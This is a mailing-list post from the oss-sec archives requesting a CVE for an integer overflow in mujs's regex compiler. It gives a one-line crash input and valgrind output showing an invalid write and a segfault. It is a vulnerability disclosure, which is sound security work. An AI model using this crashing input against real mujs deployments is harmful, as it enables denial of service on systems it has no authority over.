oss-sec mailing list archives
CVE request - integer overflow and crash parsing regex in mujs
From: Gustavo Grieco <gustavo.grieco () gmail com>
Date: Sun, 30 Oct 2016 14:29:17 -0300
Hi, It seems there is an integer overflow somewhere affecting function js_regcomp (line 843 in regexp.c) in mujs. To reproduce (tested in revision 5c337af4b3df80cf967e4f9f6a21522de84b392a): $ echo '(/.{135303839468541,43}/);' | valgrind --quiet ./build/mujs ==29376== Argument 'size' of function malloc has a fishy (possibly negative) value: -5152 ==29376== at 0x4C2AB8D: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==29376== by 0x415FCC: js_regcomp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs) ==29376== ==29376== Invalid write of size 2 ==29376== at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs) ==29376== Address 0x2 is not stack'd, malloc'd or (recently) free'd ==29376== ==29376== ==29376== Process terminating with default action of signal 11 (SIGSEGV) ==29376== Access not within mapped region at address 0x2 ==29376== at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs) ==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs) This test case was found using QuickFuzz. Please assign CVE is suitable.
Current thread:
- CVE request - integer overflow and crash parsing regex in mujs Gustavo Grieco (Oct 30)
- Re: CVE request - integer overflow and crash parsing regex in mujs cve-assign (Oct 30)